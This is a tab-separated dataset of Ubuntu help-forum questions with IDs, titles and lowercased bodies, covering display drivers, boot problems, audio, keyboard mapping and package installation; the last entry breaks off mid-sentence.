252616	how to free the print key	i would like to use the print key for my own purpose . by default , it is bound to various screenshot functions . i tried the following , which did not work : [ system settings ] [ keyboard ] [ shortcuts ] [ screenshots ] . there i disabled all print variations with backspace . closing the app and reentering shows me that all these functions are disabled . what strikes me as odd is that the regular print function is listed twice : however , the key print ( also according to xev it 's that key ) still produces a screenshot . edit : and here is what xev says : ~/pictures $ xev|grep keycode state 0x0 , keycode 36 ( keysym 0xff0d , return ) , same_screen yes , state 0x0 , keycode 107 ( keysym 0xff61 , print ) , same_screen yes ,
252622	made slight change to /etc/network/interfaces and system wo n't boot gui correctly	i have a completely down server at this point . i am new to linux and brought up a server on ubuntu 12.10 . i wanted to try kvm so i setup /etc/network/interfaces correctly for a bridge . as i learned a little more about the networking tools , i decided to use ethtool to change the speed of the bridge . i happened to place the ethtool command in the wrong location in the file and now the entire server boots to a screwed up gui and i do n't know how to recover . i could reinstall the server but i am really tired of doing that with ubuntu . i think the problem is that ubuntu does n't like my radeon 7400 graphics card or something so it is really hard to get installed in the first place since it gives a blank screen half the time . now , after making this change to the the interfaces file , it screwed up the entire display . how in the world does changing a network config screw up the entire graphics display ? i am pretty unimpressed with ubuntu at this point . it seems very unstable and difficult to install . any thoughts on how i might recover without another reinstall ? i tried using a live cd but it wo n't work because it ca n't seem to recognize the graphics card to give me any type of display .
252627	xorg ca n't find screens	i recently installed ubuntu 12.10 on my laptop . it installed successfully , but whenever i boot into it , after the grub screen i get a text tty . i can log in with that and enter command-line commands . i have tried : running startx . after initializing extensions , it tries to load extension glx and then has a fatal error , `` no screens found '' . looking at /var/log/xorg.0.log shows that `` screen ( s ) found , but none has a usable configuration . '' running sudo xorg , which did the same as startx . removing and reinstalling xserver-xorg with apt-get . this ran successfully but did n't seem to change anything . doing sudo dpkg-reconfigure xserver-xorg , which seemed to have no effect and did n't output anything . running gnome-session , which says that it `` could not open x display '' . running sudo service gdm restart , which makes the screen flicker a few times and then seems to have no effect . looking at /etc/x11/xorg.conf , but that turns out to not exist . changing the `` configured video device '' in /etc/x11/xorg.conf.failsafe to use fbdev instead of vesa . this seemed to have no effect . removing ~/.xauthority , which also seemed to have no effect . other relevant facts : i added nomodeset to the grub boot options . not doing this causes the screen to just go black and stay black . the laptop had uefi which made installing ubuntu difficult , but that seems to be disabled now . the graphics card is nvidia geforce gtx , 670m and 30gb . i ca n't easily post log files here because i have no way of getting them off the computer short of typing them up manually . i 'm a newbie , so if there 's a workaround please share ! thanks for all help ! : )
252628	ca n't adjust screen brightness on ubuntu 12.04lts	my laptop is samsung np-q430-js03us . i have searched for the solution . i have tried editing grub acpi_osi=linux and acpi_backlight=vendor , but still did n't work . please help .
252629	stuck at `` booting without full network configuration ''	after some point , i start having to remove /etc/x11/xorg.conf in order to move forward from `` booting without full network configuration '' . thus what i do every time i reboot my ubuntu is to login in safe mode , remove xorg.conf and reboot . does anyone have any idea ? thank you so much . $ uname -a linux 130s-serval 3.5.0-23-generic # 35-ubuntu smp thu jan 24 13:15:40 utc 2013 x86_64 x86_64 x86_64 gnu/linux $ dpkg -p xserver-xorg version : 1:7.7+1ubuntu4 xorg.conf looks like this : # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 304.51 ( buildd @ batsu ) fri oct 12 12:53:54 utc 2012 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection
252633	how to map right windows key to backspace ?	backspace key is out of range of my right hand , and everytime i work with text editor in such conditions where i need a backspace key stroke , it makes me look at my keyboard , and so disturbs my rhythm of typing . i hardly use my right windows key . i want to map it to perform as backspace key . ( i have a us standard layout keyboard . )
252635	multiple windows options in grub menu	my system has 2 os : win 7 x64 and ubuntu 12.10 . i 'm getting 2 windows boot options : `` on dev/sda1 '' and `` on dev/sda2 '' . what does this mean ? what implications does this have for my continued windows usage and for when i may remove the ubuntu installation later ? longer : i was running just win 7 x64 , then installed ubuntu 12.10 along side it . was trying to boot back to windows 7 only to get a `` disc reading error . '' booted back to ubuntu , grabbed boot-repair , then used mbr repair in boot-repair . system could then boot back to windows but in fact always did so directly , i.e . always by-passed ubuntu . then i used the ubuntu livecd to get boot-repair and used the `` recommended '' repair option . now everything works normally except for the issue described here . both windows options in grub boot to the same win installation i had previously . p.s . running `` sudo update-grub '' maintains both the windows options .
252637	can i run opengl 3.3 or higher ( with or without hw acceleration ) on 12.10 with intel graphics ?	i 'm currently taking a graphics programming class . all the assignments have to be done using opengl 3.3 ( shader based ) . when i try to compile my code on my laptop ( sony vaio running 12.10 ) , i get the error error : undefined reference to 'gldrawarrays ' . the trick here is i do n't care if it 's fast . i realize the driver support might not be there , but i 'm just looking for some way to get my code to actually compile and run . is there an intel driver that supports this ? is there a software-based opengl that i could use instead ? i 've got a hybrid intel/ati graphics card , but any time i try to install flgrx i either get a desktop with no dash or i get no xserver at all . here 's a few snippets from my glxinfo output : ( the whole thing is too long to put here ) direct rendering : yes server glx vendor string : sgi server glx version string : 1.4 ... opengl vendor string : intel open source technology center opengl renderer string : mesa dri intel ( r ) sandybridge mobile opengl version string : 3.0 mesa 9.0 opengl shading language version string : 1.30 and here 's some stuff from my lspci : 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati whistler [ amd radeon hd 6600m series ]
252638	how can i change the number of workspaces in `workspace grid` extension ?	i installed workspace grid extension and the default setup came with 2 x 3 workspaces . but , i only want 2 x 2 . i tried to edit this configuration in https : //extensions.gnome.org/local/ , however my ubuntu 11.10 oneiric oncelot does not support the configuration button . i think it is because i ca n't use a newer version of gnome shell . currently , i 'm using gnome shell 3.2.2.1 . how can i change the number of workspaces without using the configuration button ?
252640	ubuntu 12.10 lightdm is listing all the ldap users logged in to the system	i have ubuntu 12.10 installed with lightdm display manager on my machine in office . i have enabled ldap authentication and it works fine . the problem is every user who logs in to the machine using ldap credentials can see other users listed along with his account under users and accounts above logout option in the top right menu . i want only the current user account to be shown there . i have added the following in my /etc/lightdm/lightdm.conf file but the problem persists [ seatdefaults ] section : greeter-hide-users=true please help .
252641	blank screen after login ubuntu 12.10	there is literally nothing on the screen except the colorful background and the mouse . issue with windows 8+ intel hd+ sun virtual box+ 32 mb of video memory after the login nothing comes up but able to go to cli by ctrl+alt+f1 . also i started up ssh and able to work through the cli but ui doesnt work at all . do i need any specific version of the drivers for intel hd 4000 ?
252643	removing a defined variable from .bashrc	previously i defined a variable in my .bashrc file . now i comment it and source the file again . however the echo command still returns the previous value . 1 ) $ echo $ db_root /home/mahmood/db-4.0 2 ) $ grep db_root .bashrc # export db_root=/home/mahmood/db-4.0 # export db_root=/home/mahmood/db-4.0-default # export script_root= $ db_root/scripts # export script_root2= $ db_root/scripts # export stat_dir= $ db_root/stat-manager # export ckptdir= $ db_root/checkpoints # export path= $ simics_root/bin : $ simics_root/amd64-linux/bin : $ db_root/stat-manager : $ path 3 ) $ source .bashrc $ echo $ db_root /home/mahmood/db-4.0 the source command has no effect . am i missing another search location ?
252644	network-manager do not start automatically	how to auto start network-manager ? i installed ubuntu mini iso and ubuntu-gnome-desktop ( without the install recommendations ) . so , i have the system working fine , except that the network manager do not automatically start . i even tried adding it to the gnome-session-properties ( startup applications ) , but no luck . i am using the following command to manually start it through terminal : sudo service network-manager start i also get the message while booting saying that 'waiting for netwrok configuration ' and then 'booting without full network configuration ' .
252648	pulse audio bluetooth card profile not displaying on ubuntu 12.10	i am running ubuntu 12.10 and do n't see a bluez_card profile on my system : $ pactl list cards short 0 alsa_card.pci-0000_00_1b.0 module-alsa-card.c i tried to load the module as suggested here 12.04 - bluetooth headset disappeared $ pactl load-module module-alsa-sink device=bluetooth failure : timeout i am trying to get the bluetooth card profile to display so that i can set it up like it is done here : why did my bluetooth headset disappear from sound settings and how can i get it back ? $ pactl list cards short 0 alsa_card.pci-0000_01_00.1 module-alsa-card.c 1 alsa_card.usb-generic_turtle_beach_usb_headset_0000000001-00-headset module-alsa-card.c 2 alsa_card.pci-0000_00_14.2 module-alsa-card.c 8 bluez_card.c8_84_47_04_21_6f module-bluetooth-device.c $ pactl set-card-profile bluez_card.c8_84_47_04_21_6f a2dp update i have the pulseaudio-module-bluetooth package installed . i tried loading the module module-bluetooth-discover but nothing happens . how can i set this up in /etc/pulse/default.pa ? now in the sound settings the ouput tab is selected but under where it says play sound through there are no items showing anymore . when i try listing all of the profile cards it says connection failure $ pactl list cards short connection failure : connection refused update # 2 the answer to this post : sound settings panel empty on 12.04 helped me solve the no sound options problem . however , i am now back to : $ pactl list cards short 0 alsa_card.pci-0000_00_1b.0 module-alsa-card.c update # 3 after uninstalling and reinstalling the pulseaudio package , i tried loading the bluetooth module module-bluetooth-discover . the first time i ran it , it output welcome to pulseaudio ! use `` help '' for usage information . then i checked the profile cards but no bluetooth card displays : $ pactl list cards short 0 alsa_card.pci-0000_00_1b.0 module-alsa-card.c i loaded the bluetooth module again and this time it output : welcome to pulseaudio ! use `` help '' for usage information . > > > module load failed . i checked and now the bluetooth card displays . strange behavior , but it works now . thanks @ takkat . update # 4 this just went out again . i tried removing and reinstalling the pulseaudio-module-bluetooth package , and loading the module module-bluetooth-discover but i am back to where i started . $ pactl list cards short 0 alsa_card.pci-0000_00_1b.0 module-alsa-card.c update # 5 after installing recent updates from the update manager and restarting my machine it is back to working : $ pactl list cards short 0 alsa_card.pci-0000_00_1b.0 module-alsa-card.c 1 bluez_card.00_0c_8a_53_70_d0 module-bluetooth-device.c this whole bluetooth setup in 12.10 is very unpredictable . hopefully this gets shored up in 13.04 .
252653	samsung uefi brick	i think i might have bricked the computer while trying to boot it from a usb stick . i had windows 7 and ubuntu 12.04 installed , and the computer ( samsung np550p5c ) had come with preinstalled windows 8 . i clean installed windows 7 by changing the boot option from uefi to cms os.yesterday i was trying to reinstall ubuntu but this time through a usb stick , and cms boot option could not recognize the usb so i changed the option back to uefi . ever since then , i can not even go into bios options to change it back to cms os but i can see the samsung logo after powerup , and black screen after that . does this mean that it is bricked ? is there any other way of fixing it other than sending it to samsung for motherboard replacement ? note : i know this might not be the best place to ask such a question , but it is all i could think of at the moment . edit : forgot to add that when i see the samsung logo , the usual f2 and f4 options do not show there , if they did , i could just switch back to csm and all would be well ( i guess ) .
252654	i deleted swap partition , what more i should do ?	well i deleted my swap partition using gparted just because i needed one more primary partition and the swap was the 4th , that is the maximum number of primary partitions . i think i do n't need it anyway . the question is : is anything more that i should do to disable swap from the system ? i 'm afraid that the system can anytime try to write anything on the swap partition that does n't exist anymore and maybe crash ... i do n't know . well i do n't know even if the system will restart normally the next time . oh one more thing ... can i create a swap page file or something inside of os partition just to hibernate ? does it make sense ? forgive me if i said anything stupid . i 'm new to linux . i 'm using ubuntu 12.10 btw . thanx .
252656	ubuntu not working in vaio	i followed the as said for my vaio with radeon hd 7550m ( win 8 pre-installed ) . now i am unable to access ubuntu any way . the only way i could access is through recovery menu and in terminal mode . i tried to remove the driver by the command `` sudo apt-get remove fglrx-* '' , but it was showing error . please help
252668	uninstall nvidia updates	having installed two nvidia updates `` 304.43-oubuntu0.2 , automatic '' and `` 304.64-oubuntuo.1 '' my computer will not boot correctly , indicating that it is operating in , `` low resolution '' . how can i uninstall these updates please , i can find no obvious method ? the dual boot system with windows 7 was working fine prior to the update .
252672	gnome installed , but gives segmentation fault every time	i 've installed gnome through ubuntu software center but when i choose it from the login menu and login then there is only my desktop background , when i try running it from the terminal i get segmentation fault ( core dumped ) i tried installing it from terminal and no result . my graphic card is nvidia 330m and i also tried removing the xorg config file and removing all the gnome config files and no result . any ideas on how to fix this ?
252673	alcatel x500 datacard wo n't recognize on ubuntu 12.04 using xhci	i have two laptops running ubuntu 12.04 with the latest updates . one is a gateway id79c and the other is an asus sm56cm . all i needed to do to get connected on the gateway was to add usbserial option to /etc/modules . i did the same thing on the asus but it seems not to be recognizing and adding the option lines in dmesg . relevant dmesg output : gateway : [ 469749.811939 ] usb 2-1.2 : new high-speed usb device number 52 using ehci_hcd [ 469750.267397 ] scsi52 : usb-storage 2-1.2:1.0 [ 469751.272023 ] scsi 52:0:0:0 : direct-access alcatel mass storage 2.31 pq : 0 ansi : 2 [ 469751.272742 ] scsi 52:0:0:1 : cd-rom alcatel mass storage 2.31 pq : 0 ansi : 2 [ 469751.274511 ] sd 52:0:0:0 : attached scsi generic sg3 type 0 [ 469751.280206 ] sr1 : scsi-1 drive [ 469751.280509 ] sr 52:0:0:1 : attached scsi cd-rom sr1 [ 469751.280714 ] sr 52:0:0:1 : attached scsi generic sg5 type 5 [ 469751.281166 ] sd 52:0:0:0 : [ sdc ] attached scsi removable disk [ 469751.403557 ] usb 2-1.2 : usb disconnect , device number 52 [ 469751.733967 ] usb 2-1.2 : new high-speed usb device number 53 using ehci_hcd [ 469752.189850 ] option 2-1.2:1.0 : gsm modem ( 1-port ) converter detected [ 469752.190072 ] usb 2-1.2 : gsm modem ( 1-port ) converter now attached to ttyusb0 [ 469752.190267 ] option 2-1.2:1.1 : gsm modem ( 1-port ) converter detected [ 469752.190482 ] usb 2-1.2 : gsm modem ( 1-port ) converter now attached to ttyusb1 [ 469752.190831 ] option 2-1.2:1.2 : gsm modem ( 1-port ) converter detected [ 469752.190984 ] usb 2-1.2 : gsm modem ( 1-port ) converter now attached to ttyusb2 [ 469752.191243 ] option 2-1.2:1.3 : gsm modem ( 1-port ) converter detected [ 469752.191449 ] usb 2-1.2 : gsm modem ( 1-port ) converter now attached to ttyusb3 [ 469752.191875 ] scsi53 : usb-storage 2-1.2:1.4 [ 469752.192126 ] option 2-1.2:1.5 : gsm modem ( 1-port ) converter detected [ 469752.192331 ] usb 2-1.2 : gsm modem ( 1-port ) converter now attached to ttyusb4 [ 469752.192520 ] option 2-1.2:1.6 : gsm modem ( 1-port ) converter detected [ 469752.192656 ] usb 2-1.2 : gsm modem ( 1-port ) converter now attached to ttyusb5 [ 469753.189991 ] scsi 53:0:0:0 : direct-access alcatel mass storage 2.31 pq : 0 ansi : 2 [ 469753.191413 ] sd 53:0:0:0 : attached scsi generic sg3 type 0 [ 469753.194091 ] sd 53:0:0:0 : [ sdc ] attached scsi removable disk asus : [ 55094.440196 ] usb 3-2 : new high-speed usb device number 4 using xhci_hcd [ 55094.459739 ] usb 3-2 : ep 0x1 - rounding interval to 32768 microframes , ep desc says 0 microframes [ 55094.459752 ] usb 3-2 : ep 0x81 - rounding interval to 32768 microframes , ep desc says 0 microframes [ 55094.856171 ] scsi8 : usb-storage 3-2:1.0 [ 55095.855573 ] scsi 8:0:0:0 : direct-access alcatel mass storage 2.31 pq : 0 ansi : 2 [ 55095.856306 ] scsi 8:0:0:1 : cd-rom alcatel mass storage 2.31 pq : 0 ansi : 2 [ 55095.858282 ] sd 8:0:0:0 : attached scsi generic sg3 type 0 [ 55095.860853 ] sr1 : scsi-1 drive [ 55095.861136 ] sr 8:0:0:1 : attached scsi cd-rom sr1 [ 55095.861322 ] sr 8:0:0:1 : attached scsi generic sg4 type 5 [ 55095.864531 ] sd 8:0:0:0 : [ sdc ] attached scsi removable disk the only difference that i can see is that the asus is using xhci_hcd ( usb 3.0 ) vs ehci_hcd ( usb 2.0 ) on the gateway . i have also tried manually switching with usb_modeswitch but it says it ca n't find previous drivers . any help would be greatly appreciated .
252675	how do i restore the default permission on a directory/folder ?	i am using ubuntu 10.04 , i need to give execute permission in www folder.but by mistake i gave execute permission in whole var folder.sudo chmod -r 777 /varthen i try to change it into normal permission.for that i gavesudo chmod -r 775 /var/and again i gave execute permission only www folder.but the problem is my index.html file is not run which is located in inside the www folder . how to restore the default permission on the /var directory/folder .
252677	all software center mirrors are not working ?	when i try to update using update manager i get : requires installation of untrusted packages the action would require the installation of packages from not authenticated sources . when i try to install any thing via software center i get the same error but this time with an option of repair failed to download repository information check your internet connection . i looked for some solutions for this problem and one of them was to change the mirrors ( servers ) but when i try to change by choosing a specific server nothing happens , the problem still there . and when i choose : select best server i get : no suitable download server was found please check your internet connection .
252679	installing bluez in python3	how do i install bluetooth/bluez modules into python3 ? in python2 i 'm able to import bluetooth and utilize it but in python3 i have no such luck . how can i import bluetooth modules in python3 ?
252680	dell xps 15 - ticking sound of subwoofer	so ... here is the thing : i keep hearing a ticking sound coming from the sub-woofer of my dell xps 15 . it happens randomly , or at least i ca n't put it in context , but once it starts it does n't stop . it does n't matter if the sound of the system is in silence , completely low or high . the sounds is there and i am completely lost in both why is it happening , and how i can solve it . it would be great if anyone has had experience with this kind of problem , or at least if you guys could point me to how i can deal with this . i have tried using alsamixer , but no luck . i have found this thread : http : //en.community.dell.com/support-forums/laptop/f/3517/t/19355283.aspx -- but i fail to see how to do this fix under ubuntu ...
252683	e : unable to locate power managment interface	i am very new to ubuntu i am running ubuntu 12.04 i tried to install the power management interface sudo apt-get install power management interface and i get e : unable to locate power management interface what does that mean how should i fix it . thanks in advance
252684	lubuntu 12.04 change screen brightness . lenovo thinkpad	how do i change the screen brightness in lubuntu 12.04 ? the screen brightness is stuck in a very bright mode and it 's quite uncomfortable .
252685	how can i partition the hdd in ubuntu 12.10 64bit ? - only have ubuntu as os on notebook	i got a new notebook dell n4050 with os ubuntu 10.10 and i upgrade it to 12.10 64bit , i have only ubuntu 12.10 64bit on my notebook , hdd space is 320 gb , when i log into os , i found ( desktop , computer and filesystem ) folders , i want to partition the hdd means do n't want to have 1 partiton with 320 gb as i have no , but want to add a new partitons to allocate . such as in windwos you have partitions `` c '' , `` d '' and `` e '' and others , so i want to allocate 1 partition to filesystem and 2 partitons to my files like a movies , education , music and others .
252687	how do i fix the icons after manually installing libreoffice 4.0 ?	i removed the previous version of libreoffice and installed the current libreoffice 4.0 from libreoffice.org/download . but now the icons and global-menubar are inactive : see screenshot . click on the image to open a full-resolution version . after the first time , i removed libreoffice 4.0 , and restarted , then installed it manually again . the script below is what i used both times . sudo apt-get -y remove libreoffice* cd /tmp wget http : //download.documentfoundation.org/libreoffice/stable/4.0.0/deb/x86_64/libreoffice_4.0.0_linux_x86-64_deb.tar.gz tar -xvf libreoffice_4.0.0_linux_x86-64_deb.tar.gz cd libreoffice_4.0.0.3_linux_x86-64_deb/debs sudo dpkg -i *.deb cd desktop-integration sudo dpkg -i *.deb cd /tmp wget http : //download.documentfoundation.org/libreoffice/stable/4.0.0/deb/x86_64/libreoffice_4.0.0_linux_x86-64_deb_langpack_nl.tar.gz tar -xvf libreoffice_4.0.0_linux_x86-64_deb_langpack_nl.tar.gz cd libreoffice_4.0.0.3_linux_x86-64_deb_langpack_nl/debs sudo dpkg -i *.deb cd /tmp wget http : //download.documentfoundation.org/libreoffice/stable/4.0.0/deb/x86_64/libreoffice_4.0.0_linux_x86-64_deb_helppack_nl.tar.gz tar -xvf libreoffice_4.0.0_linux_x86-64_deb_helppack_nl.tar.gz cd libreoffice_4.0.0.3_linux_x86-64_deb_helppack_nl/debs sudo dpkg -i *.deb question : how do i get the standard icons back ?
252688	lubuntu 12.04 change default keyboard-layout after installation .	i have lubuntu 12.04 i accidentally set the keyboard to the wrong language when i was installing the system , and now i have to change that keyboard setting every time i start the computer . how do i change the default keyboard language in lubuntu 12.04 ?
252690	need to install windows 7 on a pc that running ubuntu	i bought a new computer and installed linux ubuntu , now i need to replace it with windows 7 , how can i do that ? i tried to insert the disc and restart , but when i am doing that linux starts automatically . by the way , sorry for my bad english .
252691	12.04 can wireless network be active at login ?	i have an ubuntu 12.04 box that is no longer going to be used as a desktop . i would like to be able to switch it on and let it automatically connect to the wireless network so i can ssh into it if need be . i ca n't find any reference to set 12.04 up like this . by default it looks like no network connections are set up at the login screen . can anyone tell me how to do it ?
252692	installing postgresql 9.x on ubuntu 11.04	i tried following the direction from various websites : sudo add-apt-repository ppa : pitti/postgresql sudo apt-get update sudo apt-get install postgresql unfortunately , it still wants to install 8.4 . maybe i should specify the version : sudo apt-get install postgresql-9.0 now it is trying to install 'postgresql-9.0-dbg ' - which apparently is the debug symbols , instead of installing a version of postgresql . any suggestions on how i can install it ?
252698	why does my docking station not working correctly ?	i currently own a dell latitude x300 , with a mediabase docking station . right now , the only thing that works is recharging . everything on the laptop works just fine . the thing is that i 've never encountered such problem when i had windows xp installed . i have ubuntu 12.04 .
252702	got the headphone jack working but sound settings disappeared - ubuntu 12.04	i 'm running ubuntu 12.04 on lenovo thinkpad e420s . initially everything was working great , but after a while , the head phone jack stopped working . speakers used to work just fine . so i tried out many solutions , i 'll summarize below for reference : headphone jack not working ? ( a ) one solution asks you to modify analog-output-headphones.conf , but it did n't work for me . ( b ) another solution asks you to modify /etc/modprobe.d/alsa-base.conf , that did n't work , but part of that would have been the solution ( see the last part ) http : //linux-al.blogspot.com/2012/05/headphones-not-working-no-sound-under.html does n't work for me headphones and ubuntu 12.04 ( again ) a combination of this and 1 ( b ) did the trick . basically , i uninstalled pulseaudio and installed gnome-alsamixer . i then added just the following line : options snd-hda-intel model=generic '' into /etc/modprobe.d/alsa-base.conf head phones started working . but i 'm facing a new problem now . now sound is coming from both headphones and the laptop speakers . also , if i go to sound settings , all of the options have been disabled , including the option to select hardware and modify master volume . even the volume buttons are n't working any more . any suggestions how to go about fixing this ? $ lspci | grep `` audio '' 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 04 )
252703	remember windows after reboot	is there a way to remember the windows i had opened in a session after reboot on unity ? i 'm aware that is possible on kde and gnome , but is it possible on unity ?
252704	i can not install any package ( linux-image-server , linux-server dependencies errors )	i 'm very new to ubuntu and i messed up something and i can not install any packages with apt-get install . initially i got this error : the following packages have unmet dependencies : linux-image-server : depends : linux-image-3.2.0-36-generic but it is not going to be installed linux-server : depends : linux-headers-server ( = 3.2.0.36.43 ) but 3.2.0.37.45 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . and when i tried to run `` sudo apt-get -f install '' i get this : dpkg : dependency problems prevent configuration of linux-image-server : linux-image-server depends on linux-image-3.2.0-36-generic ; however : package linux-image-3.2.0-36-generic is not installed . dpkg : error processing linux-image-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . dpkg : dependency problems prevent configuration of linux-server : linux-server depends on linux-image-server ( = 3.2.0.36.43 ) ; however : package linux-image-server is not configured yet . linux-server depends on linux-headers-server ( = 3.2.0.36.43 ) ; however : version of linux-headers-server on system is 3.2.0.37.45. dpkg : error processing linux-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : linux-image-server linux-server e : sub-process /usr/bin/dpkg returned an error code ( 1 ) any help is much appreciated because i do n't know what to do next .
252708	how to read/mount a .gz.dd image file ?	i have a partition file ( a .gz.dd file ) that i need to read the files from . i 'm new to linux and i do n't know how i can read/mount .dd files in ubuntu . would you guys tell me the procedure of reading the file ? thanks .
252713	rhythmbox crashing on startup due to segmentation fault	this is the terminal output : ( rhythmbox:5912 ) : rhythmbox-warning ** : could not open device /dev/radio0 ( rhythmbox:5912 ) : gdk-critical ** : gdk_error_trap_pop_internal : assertion `trap ! = null ' failed ** ( rhythmbox:5912 ) : warning ** : error calling get_info : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/dbus/service.py '' , line 707 , in _message_cb retval = candidate_method ( self , *args , **keywords ) file `` /usr/lib/python2.7/dist-packages/ubuntuone-client/ubuntuone/platform/ipc/linux.py '' , line 756 , in get_info return self.service.folders.get_info ( path ) file `` /usr/lib/python2.7/dist-packages/ubuntuone-client/ubuntuone/syncdaemon/interaction_interfaces.py '' , line 166 , in inner result = f ( *new_args , **new_kwargs ) file `` /usr/lib/python2.7/dist-packages/ubuntuone-client/ubuntuone/logger.py '' , line 283 , in inner res = f ( *args , **kwargs ) file `` /usr/lib/python2.7/dist-packages/ubuntuone-client/ubuntuone/syncdaemon/interaction_interfaces.py '' , line 721 , in get_info mdobj = self.fs_manager.get_by_path ( path ) file `` /usr/lib/python2.7/dist-packages/ubuntuone-client/ubuntuone/syncdaemon/filesystem_manager.py '' , line 795 , in get_by_path mdid = self._idx_path [ path ] keyerror : '/home/user/.ubuntuone/purchased from ubuntu one' ** ( rhythmbox:5912 ) : critical ** : syncdaemon_folder_info_get_subscribed : assertion `syncdaemon_is_folder_info ( finfo ) ' failed segmentation fault ( core dumped ) '' how can i stop rhythmbox from crashing ?
252716	ubuntu 12.10 system settings - > system - > details missing	i wanted to change the dafault email application in ubuntu 12.10 . i read that i have to go to system settings - > system - > details . however , there is no details . is this because i use gnome 3 or did the option change ? can i change the default application differently ?
252717	how to make shutter as the default screenshot tool ?	i have shutter 0.90 on my ubuntu 12.04 machine ( installed via ppa ) . i would like to use it as my default screenshot tool with the print shortcut key . but i ca n't find the option in shutter . it should be in preferences - > keyboard , but i do n't see the keyboard option there . i also tried to make a shortcut in ubuntu with shutter -f. it does n't work too . what can i do to use shutter when i press the print key ?
252718	how do i install unity web apps from the software repositories ?	i found .deb files in my cache for some webapps i installed . then i used apt-get to install some other web apps . but the icons are n't showing up on the unity bar . how do i rectify this ?
252728	appmenu not working in libreoffice4.0	i manually downloaded and installed libreoffice , but know the global-menu wont work . i tried to install the lo-menubar package but that did n't work . question : how to get the libreoffice menubar to work
252734	apt-get mass install packages from a file ?	i have a text file with lots of package names . package1 package2 # comment # installing package3 because it was needed for ... package 3 package 4 how can i mass install all packages inside the text file without removing the comments ?
252736	how to fix smart hard disk error ( 301 ) ?	today when i opened my laptop , it displays the message smart hard disk error 301 and it tells me to run diagnostic test and gives me options on what to do . but the problem is that it passes the quick test but fails full test which runs only up to 18 % . it also runs very very slow and at times when i have managed to switch on , it freezes and i think its because the processor has over heated . is the problem associated with hard drive or processor or both things need fixing . how do i fix this ?
252737	can i change the look of the panel icons in xfce ?	i 'd like to make the notification and workspaces symbols ( all in the so-called panel 1 ) a bit brighter . or change them to whatever makes them a bit more distinguishable . currently , it looks like this : this is the elementary xfce style for the icons . ironically , the elementary xfce dark theme is a bit better , but still , the bluetooth and dropbox icons are pretty dark . it 's not easy on the eyes , imho . same goes for the workspaces switcher . the workspaces are only distinguishable because i know where they are and there is a single blue mark on the active one . would anyone happen to have any sort of advice on how to improve this issue from my perspective ? ( i am asking this specific way since i imagine some of you are fine with it . )
252738	configure xfce4-screenshooter settings	xfce4-screenshooter is the standard screenshot program in xfce on xubuntu . how can i configure the settings about which format it saves the screenshot in and in which folder ? i noticed , that my settings i made in shutter also affect the settings of xfce4-screenshooter ( but not all ) . edit : the man page sais , there is an -o option to open it with an external program . how can i make this default ? then i could set there an external program , that automatically compresses the screenshot to an emailable size
252739	website not working : -403 - forbidden : access is denied	one of my website is showing 403 forbidden error . all the permission in document root are 755 and ownership of user and group www-data . configuration file is . directory /var/www/public_html > addhandler fcgid-script .php options +execcgi +includes +indexes allowoverride all fcgiwrapper /var/www/php.fcgi .php /directory > thanks in advance ,
252740	remove files in multiple directories except some sub-folders	i 'm using ubuntu server 12.10 and i need to configure a cron job to delete some files in samba shares that belong to some criteria . i 'm configured some samba shares in /media/raid/ . the folders are : process library users local all these folders are specific samba shares with specific permissions . all of these folders have a sub-folder named .recycle that is used to store all deleted files in the shares . what i need to do is to delete all files that are inside that shares ( folders ) , in order to them go to the .recycle folder after they will be deleted , but i do n't want to delete the files that have that same name in the .recycle folder . the files are named '..rvt ' where the first * is the file name and the second one is some numbers that auto increment , so that 's the mask i need to use . i have tried find command in multiple ways , but i always get the files inside .recycle folder . i also need to assure that the files are removed like a user delete them , so they go to the .recycle directory . can you help ? ? ? ...
252741	ubuntu server 12.04 on dell poweredge t320	is it possible to install/run ubuntu 12.04 lts server with backuppc backup software correctly on dell poweredge t320 server ( xeon e5-2403 1.80ghz/10mb / 1x4gb dual rank rdimm 1600mhz ) with perc h310 raid controller ? we are thinking of changing our old backup server and need to be sure that this will really work prior to ordering .
252743	mouse movement wakes computer from suspend how to disable this ?	it 's really annoying as i have to unplug the mouse after a suspend to ensure that an occasional bump does n't wake up the system . i have n't found anything in system settings which could disable this neither by googling around .
252744	asus x202e vivobook , dual boot . how to get around uefi and have win8 & ubuntu ?	i 've gotten my hands on an asus vivobook x202e . i like it , handy to use , small , etc etc . oh , it 's the i3 core version . for school i still need windows * sigh * for the .net development . ( i know , possible in ubuntu , this n that , but for ease atm wanting to keep it with win8 ) . so . how to install both on this little thing ? i 've found a way into the bios ( before splash screen , mash f2 . works only after reboot , not cold boot ) . but the whole boot loading setup is different than from what i know , and i must 've messed up something because it 's been `` attempting repairs '' , `` analyzing hard disk '' , and a bunch of other things for the past 15 minutes . ( all i 've done is selected `` disabled '' on secure boot , picky as ** microsoft ) . keeping the original windows installation is of no concern . found the product key already and have a clean install waiting . btw , not trying to leech knowledge , even though first question and no answers . i 'm more and more active on stackoverflow . but , especially due to secure boot and windows 8 , i 'm going over to ubuntu . well , more and more anyway , i like my windows based games as well ; ) update managed to do a clean install of windows 8 pro . after disabling secure boot , also had to disable fast boot , and enable launch csm , leaving the option which appeared ( launch pxe oprom ) disabled . then i rebooted , with the usb boot drive i created using the windows 7 usb dvd download tool ( scroll down for download link ) , provided by microsoft . during the installation , i chose to install a clean version , therefor deleted the partitions containing current windows files . i left the recovery partition ( you never know ... ) . of course , the new windows installation dit not like this . apparantly windows can not be installed on a gpt hard disk . remember i had n't changed the partition table , was still factory default ! minus a few partitions , granted . so deleted all 